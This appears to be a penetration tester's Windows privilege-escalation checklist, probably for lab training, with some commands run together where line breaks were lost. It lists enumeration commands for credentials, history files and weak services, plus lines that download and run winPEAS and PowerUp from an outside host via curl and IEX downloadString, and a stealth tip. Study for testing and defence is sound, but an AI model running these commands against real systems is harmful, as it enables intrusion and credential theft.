Checklist
Adding a new user to the local Administrators group is the nosiest thing you can do. Instead always try to get the first stage of the payload executed
Basic enum / quick wins
set username
set computername
whoami /allcmdkey /listsysteminfonet user
net user <current user>net groupGet-History(Get-PSReadlineOption).HistorySavePath
type <previous command output>ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Network and port enum
ipconfig /allnetstat -ano
route printInstalled software and service enum
dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displaynameGet-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displaynamereg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\InstallerservicesGet-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}cmd.exe /c cmd.exe /c 'wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """''wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """'icacls <service binary path>sc.exe sdshow <Service>Sensitive file enum
$env:AppKeygci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinuegci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinuegci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinuegci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinuegci C:\Users\Publicwhere.exe /R C:\Windows bash.exe
where.exe /R C:\Windows wsl.exeProcess snooping
Import-Module .\Watch-Command.ps1
Get-Process | watch-command -diff -cont -verbose -property "Image Name"Winpeas
curl 192.168.45.x/winPEASx64.exe -o winpeas.exe
.\winpeas.exePowerUp
IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-AllchecksIEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/Privesc.ps1');Invoke-PrivEscPrivescCheck
powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'eventvwr
Applicatioins and Services
Microsoft
Windows
Powershell
Operational
Filter current log
Event 4104
Last updated